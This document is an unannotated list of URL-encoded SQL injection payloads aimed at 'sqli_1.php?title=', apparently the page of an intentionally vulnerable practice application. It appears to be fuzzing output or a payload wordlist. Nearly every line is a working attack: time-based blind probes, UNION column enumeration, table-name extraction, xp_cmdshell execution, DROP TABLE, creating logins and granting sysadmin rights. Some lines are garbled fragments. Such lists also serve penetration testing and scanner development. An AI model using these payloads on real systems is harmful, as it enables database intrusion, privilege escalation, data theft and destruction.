%20'sa'%20waitfor%20delay%20'0:0:2'%20-->sqli_1.php?title=';%20if%20not(select%20system_user)%20<>%20'sa'%20waitfor%20delay%20'0:0:2'%20--
%200%20waitfor%20delay%20'0:0:2'%20-->sqli_1.php?title=';%20if%20is_srvrolemember('sysadmin')%20>%200%20waitfor%20delay%20'0:0:2'%20--
%200)%20waitfor%20delay%20'0:0:2'%20-->sqli_1.php?title=';%20if%20not((select%20serverproperty('isintegratedsecurityonly'))%20<>%200)%20waitfor%20delay%20'0:0:2'%20--
%200)%20waitfor%20delay%20'0:0:2'%20-->sqli_1.php?title=';%20if%20not(substring((select%20@@version),25,1)%20<>%200)%20waitfor%20delay%20'0:0:2'%20--
%201)%20waitfor%20delay%20'0:0:2'%20-->sqli_1.php?title=';%20if%20not((select%20serverproperty('isintegratedsecurityonly'))%20<>%201)%20waitfor%20delay%20'0:0:2'%20--
%201)%20waitfor%20delay%20'0:0:2'%20-->sqli_1.php?title=';%20if%20not(substring((select%20@@version),24,1)%20<>%201)%20waitfor%20delay%20'0:0:2'%20--
%20116>sqli_1.php?title=1%20and%20ascii(lower(substring((select%20top%201%20name%20from%20sysobjects%20where%20xtype='u'),%201,%201)))%20>%20116
%205)%20waitfor%20delay%20'0:0:2'%20-->sqli_1.php?title=';%20if%20not(substring((select%20@@version),25,1)%20<>%205)%20waitfor%20delay%20'0:0:2'%20--
%208)%20waitfor%20delay%20'0:0:2'%20-->sqli_1.php?title=';%20if%20not(substring((select%20@@version),25,1)%20<>%208)%20waitfor%20delay%20'0:0:2'%20--
'%20OR%201=1-->sqli_1.php?title='%20OR%201=1--
',%20''%201-->sqli_1.php?title='%20union%20select%201,%20'',%20''%201--
'-->sqli_1.php?title='--
'>sqli_1.php?title=exec%20master..xp_cmdshell%20'ping+'
\\backupdb.dat'>sqli_1.php?title=BACKUP%20database%20master%20to%20disks='\\\\backupdb.dat'
sqli_1.php?title=
sqli_1.php?title="%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title="%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title="%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title="%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title="%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=")%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title=")%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title=")%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title=")%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=")%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title="))%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title="))%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title="))%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title="))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title="))%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=")))%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title=")))%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title=")))%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title=")))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=")))%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title="))))%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title="))))%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title="))))%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title="))))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title="))))%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=")))))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=")))))%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title="))))))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title="))))))%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title="),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
sqli_1.php?title="),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
sqli_1.php?title="),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
sqli_1.php?title="),NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title="),NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title="),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title="),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title="),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title="),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title="),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title="),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title="),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title="),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title="),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title="),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title="),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title="),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title="),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title="),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title="+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title=",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
sqli_1.php?title=",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
sqli_1.php?title=",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
sqli_1.php?title=",NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=",NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title='%20;%20drop%20table%20temp%20--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5,6--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4,5--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3,4--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2,3--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201,2--
sqli_1.php?title='%20UNION%20SELECT%20ALL%201--
sqli_1.php?title='%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title='%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title='%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title='%20exec%20sp_addsrvrolemember%20'name'%20,%20'sysadmin'%20--
sqli_1.php?title='%20grant%20connect%20to%20name;%20grant%20resource%20to%20name;%20--
sqli_1.php?title='%20insert%20into%20mysql.user%20(user,%20host,%20password)%20values%20('name',%20'localhost',%20password('pass123'))%20--
sqli_1.php?title='%20insert%20into%20users(login,%20password,%20level)%20values(%20char(0x70)%20+%20char(0x65)%20+%20char(0x74)%20+%20char(0x65)%20+%20char(0x72)%20+%20char(0x70)%20+%20char(0x65)%20+%20char(0x74)%20+%20char(0x65)%20+%20char(0x72),char(0x64)
sqli_1.php?title='%20or%201=1%20--
sqli_1.php?title='%20or%20username%20is%20not%20NULL%20or%20username%20=%20'
sqli_1.php?title='%20union%20(select%20@@version)%20--
sqli_1.php?title='%20union%20(select%20NULL,%20(select%20@@version))%20--
sqli_1.php?title='%20union%20(select%20NULL,%20NULL,%20(select%20@@version))%20--
sqli_1.php?title='%20union%20(select%20NULL,%20NULL,%20NULL,%20%20(select%20@@version))%20--
sqli_1.php?title='%20union%20(select%20NULL,%20NULL,%20NULL,%20NULL,%20%20(select%20@@version))%20--
sqli_1.php?title='%20union%20(select%20NULL,%20NULL,%20NULL,%20NULL,%20%20NULL,%20(select%20@@version))%20--
sqli_1.php?title='%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title='%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=')%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title=')%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title=')%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title=')%20or%201=1%20][('%20or
sqli_1.php?title=')%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=')%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title='))%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title='))%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title='))%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title='))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title='))%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=')))%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title=')))%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title=')))%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title=')))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=')))%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title='))))%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title='))))%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title='))))%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title='))))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title='))))%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=')))))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=')))))%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title='))))))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title='))))))%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title='),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
sqli_1.php?title='),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
sqli_1.php?title='),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
sqli_1.php?title='),NULL)%20waifor%20delay%20'0:0:20'%20/*
sqli_1.php?title='),NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title='),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title='),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title='),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title='),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title='),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title='),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title='),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title='),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title='),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title='),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title='),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title='),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title='),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title='),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title='+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title=',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
sqli_1.php?title=',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
sqli_1.php?title=',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
sqli_1.php?title=',NULL)%20waifor%20delay%20'0:0:20'%20/*
sqli_1.php?title=',NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title='===%20stored(blog)==='
sqli_1.php?title='====%20GET%20Search%20==='
sqli_1.php?title='OR%20''%20=%20' Allows%20authentication%20without%20a%20valid%20username.
sqli_1.php?title='OR%201=1--
sqli_1.php?title='create%20user%20name%20identified%20by%20'pass123'%20--
sqli_1.php?title='create%20user%20name%20identified%20by%20pass123%20temporary%20tablespace%20temp%20default%20tablespace%20users;
sqli_1.php?title='exec%20sp_addlogin%20'name'%20,%20'password'%20--
sqli_1.php?title=)%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title=)%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title=)%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title=)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=))%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title=))%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title=))%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title=))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=))%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=)))%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title=)))%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title=)))%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title=)))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=)))%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=))))%20and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title=))))%20and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title=))))%20and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title=))))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=))))%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=)))))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=))))))%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
sqli_1.php?title=),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
sqli_1.php?title=),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
sqli_1.php?title=),NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=),NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
